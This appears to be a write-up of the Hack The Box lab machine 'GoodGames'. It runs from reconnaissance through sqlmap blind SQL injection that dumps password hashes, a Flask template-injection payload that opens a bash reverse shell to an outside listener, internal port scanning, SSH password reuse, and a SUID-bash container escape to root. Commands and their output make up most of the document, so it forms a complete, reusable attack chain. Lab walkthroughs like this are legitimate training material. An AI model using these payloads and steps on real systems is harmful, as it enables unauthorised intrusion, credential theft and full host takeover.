GoodGames

Recon

nmap_scan.log
Open 10.129.73.122:80
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -sV -sC -Pn" on ip 10.129.73.122

PORT   STATE SERVICE REASON  VERSION
80/tcp open  http    syn-ack Werkzeug httpd 2.0.2 (Python 3.9.2)
|_http-server-header: Werkzeug/2.0.2 Python/3.9.2
|_http-title: GoodGames | Community and Store
|_http-favicon: Unknown favicon MD5: 61352127DC66484D3736CACCF50E7BEB
| http-methods: 
|_  Supported Methods: GET OPTIONS HEAD POST

HTTP (80)

Writeup.png
└─$ feroxbuster -u 'http://10.129.73.122/' -w /usr/share/seclists/Discovery/Web-Content/common.txt -I .css,.png -x .php -n
302      GET        4l       24w      208c http://10.129.73.122/logout => http://10.129.73.122/
200      GET      663l     1856w    31374c http://10.129.73.122/blog/1
200      GET      730l     2069w    32744c http://10.129.73.122/forgot-password
200      GET        0l        0w    44212c http://10.129.73.122/blog
200      GET      728l     2070w    33387c http://10.129.73.122/signup
200      GET     1735l     5548w    85107c http://10.129.73.122/
403      GET        9l       28w      278c http://10.129.73.122/server-status

We can register, but on profile we only see our details and can change password.

Writeup-1.png

There's only 1 blog post which is readable and the author is admin

Writeup-2.png

SQLi is possible in login. Previously I was testing for SSTI that's why you see weird combinations of characters as username.

Writeup-3.png
└─$ sqlmap -u 'http://10.129.73.122/login' --data 'email=x%40y.z&password=x' -p email --batch --threads 10 --level 5 --risk 3 --current-db
---
Parameter: email (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
    Payload: email=x@y.z' AND 5413=(SELECT (CASE WHEN (5413=5413) THEN 5413 ELSE (SELECT 4179 UNION SELECT 2612) END))-- dWqe&password=x

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: email=x@y.z' AND (SELECT 7703 FROM (SELECT(SLEEP(5)))TxLG)-- GUOh&password=x
---
[16:54:15] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
current database: 'main'
└─$ sqlmap -u 'http://10.129.73.122/login' --data 'email=x%40y.z&password=x' -p email --threads 10 --batch -D main --dump --time-sec 99 --flush-session
[*] starting @ 17:06:31 /2024-12-14/
...
[23:44:23] [WARNING] no clear password(s) found
Database: main
Table: user
[3 entries]
+----+----------------------+----------------------+----------------------------------+
| id | email                | name                 | password                         |
+----+----------------------+----------------------+----------------------------------+
| 1  | admin@goodgames.htb  | admin                | 2b22337f218b2d82dfc3b6f77e7cb8ec |
| 2  | test02@goodgames.htb | test02@goodgames.htb | b83183e0b27227533a6478de3265f0c0 |
| 3  | x@y.z                | ${{<%[%'"}}%\\       | d9adf054aa8466a9426a1fcfb811a47c |
+----+----------------------+----------------------+----------------------------------+
Writeup-4.png

Creds: admin:superadministrator

Admin has extra action which goes to administration tool.

Writeup-5.png

http://internal-administration.goodgames.htb/login

We can login with same credentials, the only functionality available on this application is editing Settings. Since the application is running on Flask let's test SSTI, and it's a success.

Writeup-6.png

Reverse Shell

{{ cycler.__init__.__globals__.os.popen('/bin/bash -c "/bin/bash -i >& /dev/tcp/10.10.14.113/4444 0>&1"').read() }}
└─$ pwncat-cs -lp 4444
[06:22:39] Welcome to pwncat 🐈!                                                          __main__.py:164
[06:23:15] received connection from 10.129.73.122:46418                                        bind.py:84
[06:23:17] 10.129.73.122:46418: registered new host w/ db                                  manager.py:957
(local) pwncat$
(remote) root@3a453ab39d3d:/backend# id
uid=0(root) gid=0(root) groups=0(root)
(remote) root@3a453ab39d3d:/backend/project# cat .env
DEBUG=True
SECRET_KEY=S3cr3t_K#Key
DB_ENGINE=postgresql
DB_NAME=appseed-flask
DB_HOST=localhost
DB_PORT=5432
DB_USERNAME=appseed
DB_PASS=pass
(remote) root@3a453ab39d3d:/backend/project# ip -brief a s
lo               UNKNOWN        127.0.0.1/8
eth0@if6         UP             172.19.0.2/16

(remote) root@3a453ab39d3d:/backend/project# ip='172.19.0.1'; for i in $(seq 1 65000); do ( echo > /dev/tcp/$ip/$i) > /dev/null 2>&1 && echo $ip":"$i "is open"; done
172.19.0.1:22 is open
172.19.0.1:80 is open
(remote) root@3a453ab39d3d:/home/augustus# arp -a
? (172.19.0.1) at 02:42:68:3f:98:63 [ether] on eth0

There's only single host and it's probably main server, curl shows that it's website on main domain.

There's home directory, but this user doesn't exist this container.

(remote) root@3a453ab39d3d:/home/augustus# ls -Alh
total 16K
lrwxrwxrwx 1 root root    9 Nov  3  2021 .bash_history -> /dev/null
-rw-r--r-- 1 1000 1000  220 Oct 19  2021 .bash_logout
-rw-r--r-- 1 1000 1000 3.5K Oct 19  2021 .bashrc
-rw-r--r-- 1 1000 1000  807 Oct 19  2021 .profile
-rw-r----- 1 root 1000   33 Dec 14 21:23 user.txt

User.txt

(remote) root@3a453ab39d3d:/home/augustus# cat user.txt
4262d99565c6807580a53ccc1aa04cda

Privilege Escalation

SSH is not open from outside, but we can SSH from container

(remote) root@3a453ab39d3d:/home/augustus# ssh augustus@172.19.0.1
augustus@172.19.0.1 password: superadministrator
augustus@GoodGames:~$ id
uid=1000(augustus) gid=1000(augustus) groups=1000(augustus)

Get processes

augustus@GoodGames:/var$ ps aux | grep -v '\[.*\]' | grep root
root         1  0.0  0.2 165260  9964 ?        Ss   Dec14   0:02 /sbin/init
root       443  0.0  0.2  22264  8408 ?        Ss   Dec14   0:00 /lib/systemd/systemd-journald
root       468  0.0  0.1  21532  5512 ?        Ss   Dec14   0:00 /lib/systemd/systemd-udevd
root       503  0.0  0.2  47816 10524 ?        Ss   Dec14   0:00 /usr/bin/VGAuthService
root       504  0.0  0.1 236980  7924 ?        Ssl  Dec14   0:27 /usr/bin/vmtoolsd
root       588  0.0  0.0   6680  2776 ?        Ss   Dec14   0:00 /usr/sbin/cron -f
root       593  0.0  0.1 219760  4488 ?        Ssl  Dec14   0:00 /usr/sbin/rsyslogd -n -iNONE
root       595  0.0  0.1  15272  7216 ?        Ss   Dec14   0:00 /lib/systemd/systemd-logind
root       664  0.0  0.1   9560  5804 ?        Ss   Dec14   0:00 /sbin/dhclient -4 -v -i -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases -I -df /var/lib/dhcp/dhclient6.eth0.leases eth0
root       774  0.0  0.5 195416 20688 ?        Ss   Dec14   0:01 php-fpm: master process (/etc/php/7.4/fpm/php-fpm.conf)
root       782  0.0  0.0   5780  1688 tty1     Ss+  Dec14   0:00 /sbin/agetty -o -p -- \u --noclear tty1 linux
root       784  0.0  1.1 1344724 48360 ?       Ssl  Dec14   0:16 /usr/bin/containerd
root       874  0.0  0.2  15332  8224 ?        Ss   Dec14   0:01 /usr/sbin/apache2 -k start
root       938  0.0  2.0 1457176 83832 ?       Ssl  Dec14   0:06 /usr/bin/dockerd -H fd:// --containerd=/run/containerd/containerd.sock
root      1046  0.0  1.5 641128 61456 ?        Ssl  Dec14   0:11 PM2 v5.1.2: God Daemon (/root/.pm2)
root      1276  0.0  0.1 1222636 7548 ?        Sl   Dec14   0:00 /usr/bin/docker-proxy -proto tcp -host-ip 127.0.0.1 -host-port 8085 -container-ip 172.19.0.2 -container-port 8085
root      1290  0.0  0.2 711700 12084 ?        Sl   Dec14   0:01 /usr/bin/containerd-shim-runc-v2 -namespace moby -id 3a453ab39d3df444e9b33e4c1d9f2071827b3b7b20a8d3357b7754a84b06685f -address /run/containerd/containerd.sock
root      1310  0.0  1.4 523372 57324 ?        Ssl  Dec14   0:08 python3 project/run.py
root      7721  0.0  0.0   4292   720 ?        S    11:28   0:00 /bin/sh -c /bin/bash -c "/bin/bash -i >& /dev/tcp/10.10.14.113/4444 0>&1"
root      7722  0.0  0.0  19708  3196 ?        S    11:28   0:00 /bin/bash -c /bin/bash -i >& /dev/tcp/10.10.14.113/4444 0>&1
root      7723  0.0  0.0  19948  3672 ?        S    11:28   0:00 /bin/bash -i
root      7743  0.0  0.0  20684  2232 ?        S    11:28   0:00 /usr/bin/script -qc /bin/bash /dev/null
root      7744  0.0  0.0   4292   712 pts/0    Ss   11:28   0:00 sh -c /bin/bash
root      7745  0.6  0.2  26532 10312 pts/0    S    11:28   0:08 /bin/bash
root     18732  0.0  0.1  45188  5420 pts/0    S+   11:47   0:00 ssh augustus@172.19.0.1
augustus 18782  0.0  0.0   6176   716 pts/0    S+   11:49   0:00 grep root

Enumerate ports and applications

augustus@GoodGames:/var$ ss -tunlp
Netid      State       Recv-Q      Send-Q           Local Address:Port            Peer Address:Port
udp        UNCONN      0           0                      0.0.0.0:68                   0.0.0.0:*
tcp        LISTEN      0           128                  127.0.0.1:8000                 0.0.0.0:*
tcp        LISTEN      0           70                   127.0.0.1:33060                0.0.0.0:*
tcp        LISTEN      0           128                  127.0.0.1:3306                 0.0.0.0:*
tcp        LISTEN      0           128                  127.0.0.1:8085                 0.0.0.0:*
tcp        LISTEN      0           128                 172.19.0.1:22                   0.0.0.0:*
tcp        LISTEN      0           128                          *:80                         *:*

Nothing interesting.

The contains seems to be connected and on .2 we are root, but on .1 we are normal user. We can copy files to this directory and using linux permissions nature we can make SUID binaries from .2 and use them on .1

augustus@GoodGames:~$ echo x > x
augustus@GoodGames:~$ ls -l x
-rw-r--r-- 1 augustus augustus 2 Dec 15 11:53 x
augustus@GoodGames:~$ exit
Connection to 172.19.0.1 closed.

(remote) root@3a453ab39d3d:/home/augustus# ls -l x
-rw-r--r-- 1 1000 1000 2 Dec 15 11:53 x
(remote) root@3a453ab39d3d:/home/augustus# cp /bin/bash .
(remote) root@3a453ab39d3d:/home/augustus# chmod 4777 bash
(remote) root@3a453ab39d3d:/home/augustus# ssh augustus@172.19.0.1
augustus@GoodGames:~$ ls -l bash
-rwsrwxrwx 1 root root 1099016 Dec 15 11:54 bash
augustus@GoodGames:~$ ./bash -p
./bash: error while loading shared libraries: libtinfo.so.5: cannot open shared object file: No such file or directory

Let's do it in reverse

augustus@GoodGames:~$ cp /bin/bash rootbash
augustus@GoodGames:~$ exit

(remote) root@3a453ab39d3d:/home/augustus# chown root:root rootbash
(remote) root@3a453ab39d3d:/home/augustus# chmod 4777 rootbash
(remote) root@3a453ab39d3d:/home/augustus# ssh augustus@172.19.0.1

augustus@GoodGames:~$ ./rootbash -p
rootbash-5.1# id
uid=1000(augustus) gid=1000(augustus) euid=0(root) groups=1000(augustus)

Root.txt

rootbash-5.1# cat /root/root.txt
24b3c43b0d89ada33653b7bc8aa1ff36
PreviousFormatNextHealth

Last updated